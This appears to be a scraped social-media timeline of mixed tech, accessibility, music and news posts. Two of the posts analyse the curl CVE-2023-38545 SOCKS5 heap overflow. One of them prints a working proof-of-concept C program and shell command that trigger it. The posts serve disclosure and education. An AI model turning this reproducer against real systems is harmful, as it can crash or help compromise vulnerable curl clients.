text-wrap:balance has landed on the latest Firefox 🎉
This allows multiple lines of text to have their lines broken in such a way that each line is roughly the same width, often used to make headlines more readable and visually appealing.
bugzilla.mozilla.org/1731541
developer.chrome.com/blog/css-…
#CSS #Typography
A classic typography technique of hand-authoring line breaks for balanced text blocks, comes to CSS.Chrome for Developers
Some useful guidance from the W3C #Internationalization Team on how people's names differ around the 🌍 world and the implications of those differences on the design of forms, databases and ontologies for the Web.
w3.org/International/questions…
How do people's names differ around the world, and what are the implications of those differences on the design of forms, databases, ontologies, etc. for the Web?www.w3.org
Does responsibility for web accessibility belong to developers or to content editors? Spoiler alert: it's both.Simon Waters (Silktide)
Daniel walks through the significant security fixes, changes and bugfixes done in the curl 8.4.0 release.0:00 intro0:16 agenda0:52 release 2521:02 participat...YouTube
Aight, I wasn't going to post the extra-spicy hot wings take. But, fuck it.
Reply-guy climate activists are the most annoying out of touch people on the planet. They'll literally show up in my mentions with shit like "why don't you bicycle down the freeway to the grocery store. You can just clench your re-usable grocery bags between your ass cheeks".
"Need to go to NYC for an important meeting? Take the train....oh, the US doesn't have trains? Why don't you just build you own."
How someone can witness the entire covid pandemic and not only be like "yes, personal responsibility will for sure solve humanity's problems" but also propose nothing but the most braindead solutions imaginable is literally beyond me.
I get the frustration with the currency system, but annoying the shit out of random Mastodon users with the most garbage advice you can muster is just not it. Some of us are actually trying to make real systemic change.
Suraj Bhattarai, unser Verbindungsmann für die nepalesische LibreOffice Community, schreibt: Die LibreOffice-Gemeinschaft in Nepal führt gemeinsam einen LibreOffice-Lokalisierungssprint 2023 durch, mit Unterstützung der wichtigsten Gemeinschaften in …Harald Berger (Blog der The Document Foundation)
Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?
The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.
The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.
Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:
bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:
/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}
But this check is *only* done in INIT state. When the state is anything else, the initial value is used.
Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:
if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.
There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.
#vulnerability #staticanalysis #infosec
My friend is back!
(it's a comment on my blog post, "pending" means it doesn't show on the site unless I approve it)
Talon reshared this.
Apple recently released the iOS 17.0.3 update to address a bug causing iPhones, especially the iPhone 15 Pro, to overheat....Filipe Espósito (9to5Mac)
Microsoft says VBScript will be ripped from Windows in a future release
Link: theregister.com/2023/10/10/mic…
Discussion: news.ycombinator.com/item?id=3…
It's PowerShell or something similar in the not too distant futureThomas Claburn (The Register)
I'm Daniel Stenberg, maintainer and lead developer in the curl project. I stream curl related stuff. Release presentations, curl development and related topics.Twitch
It’s bad, folks. Pair of CVEs incoming on October 11Richard Speed (The Register)
“In hindsight, shipping a heap overflow in code installed in over twenty billion instances is not an experience I would recommend.”
Wise words indeed
daniel:// stenberg:// reshared this.
Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:
gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out
Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.
Jo, jsem to já. Kdo mě zná osobně, by mě spíš nepoznal.
Děkuju Heroine za prostor.
The Thunderbird team is a remote-first, globally distributed group, so it made perfect sense to devote an episode of our #podcast to #RemoteWork!
Join Heather, Chris, and Jason for some useful tips and tricks to make your daily remote work more enjoyable and productive.
Plus: An inside look at the upcoming Thunderbird Send service, and some geeky Raspberry Pi solutions for weather and BBQ.
Show Notes: blog.thunderbird.net/2023/09/t…
Listen at @tilvids: tilvids.com/w/w4boAz4uZpWktmSv…
Join us for useful tips and tricks to make your daily remote work more enjoyable and productive. Plus: An inside look at Thunderbird Send!Jason Evangelho (The Thunderbird Blog)
Born 106 years ago today, Thelonious Monk fundamentally shaped jazz with his unique piano techniques and innovative compositions. During the bebop era, Monk's distinct style, marked by dissonance, intricate rhythms, and unconventional timing, pushed the boundaries of traditional jazz. He was one of a kind.
Image: Thelonious Monk by artist Debra Hurd.
1/
Jennissary & Ross Minor, Descriptive Video Works. A deep dive into the workflow, challenges, history, and player reception of Mortal Kombat 1’s brutal Audio ...YouTube
Leah Skerry, Unity. Unity’s Senior Product Manager will share what to expect in 23.2 – Screen reader support for mobile.GAconf USA 2023YouTube
Good news for #DoctorWho fans, the launch of the Doctor Who archive on IPlayer is finally happening, according to doctorwho.tv/news-and-features…
This is also a historic event for the blind and visually impaired, as well as deaf and hard of hearing fans, because the article states: "Every episode on iPlayer from the back catalogue will be available with multiple accessibility options, including subtitles, audio description, and sign language."
Classic Who audio described to me is a dream come true, and I am sure it will be appreciated by many. Allons-y, Jelly Babies await!
reshared this
Ministr zahraničí Jan Lipavský (Piráti) v úterý navštívil Izrael, na který v sobotu zaútočili palestinští teroristé. Setkal se se svým protějškem Elim Kohenem. Na sociální síti X o tom informoval izraelský novinář Amichai Stein.ČTK (Economia, a.s.)
Peter Vágner reshared this.
texto alternativo añadido
Fuente: instagram.com/p/BnuVZ9snyP6/
1,239 likes, 28 comments - roqquintana on September 14, 2018: "😇😇😇 #rqcomics #comics #comicstrip #traditionalart #digitalart #historietas #historieta"Instagram
Frog is such a neat little Linux desktop app to extract text from images.
You can give it an image (file selector, drag & drop) or let it take a screenshot. And you can even paste an image from your clipboard!
This is great for adding alt text when posting an image or copying text (as text) from a screenshot for sharing (or adding to UI mockups, as I often do).
It also reads QR codes and supports several languages.
flathub.org/apps/com.github.te…
#Linux #desktop #app #Gnome #OCR #Flatpak #Flathub
reshared this
Kara Goldfinch
in reply to Andre Louis • • •Andre Louis
in reply to Kara Goldfinch • • •Kara Goldfinch
in reply to Andre Louis • • •Borris
in reply to Kara Goldfinch • • •André Polykanine
in reply to Borris • • •Leonard de Ruijter
in reply to Andre Louis • • •Andre Louis
in reply to Leonard de Ruijter • • •Leonard de Ruijter
in reply to Andre Louis • • •Andre Louis
in reply to Leonard de Ruijter • • •Andre Louis
in reply to Leonard de Ruijter • • •